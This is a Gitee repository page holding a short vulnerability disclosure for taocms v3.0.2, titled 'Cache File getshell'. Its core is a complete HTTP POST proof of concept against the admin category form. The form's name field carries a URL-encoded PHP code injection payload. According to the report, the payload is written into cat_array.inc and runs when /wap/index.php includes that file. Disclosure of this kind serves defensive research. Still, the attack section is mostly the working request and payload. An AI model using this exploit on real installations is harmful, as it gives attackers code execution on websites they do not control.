1 Star 0 Fork 0

misak7in / cve

加入 Gitee
与超过 1000 万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
克隆/下载
taocms.md 1.32 KB
一键复制 编辑 Web IDE 原始数据 按行查看 历史
misak7in 提交于 2023-03-23 08:28 . update taocms.md.

taocms v3.0.2 Cache File getshell

download link:http://www.taocms.org/1213.html

Add columns in the management column

输入图片说明

POC:

POST /admin/admin.php HTTP/1.1
Host: www.taocms.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 161
Origin: http://www.taocms.com
Connection: close
Referer: http://www.taocms.com/admin/admin.php?action=category&ctrl=add
Cookie: PHPSESSID=3p2h8g38ejqf1402s5i384b7h0
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1

name=%27%29%29%3Bphpinfo%28%29%3B%2F*&nickname=22&fid=&cattpl=&listtpl=&distpl=&intro=33&orders=&status=1&action=category&id=&ctrl=save&Submit=%E6%8F%90%E4%BA%A4

The contents of the file are written to cat_array.inc

输入图片说明

/wap/index.php will contain the file

输入图片说明

If we go to /wap, we get the shell

输入图片说明

1
https://gitee.com/misak7in/cve.git
git@gitee.com:misak7in/cve.git
misak7in
cve
cve
master

搜索帮助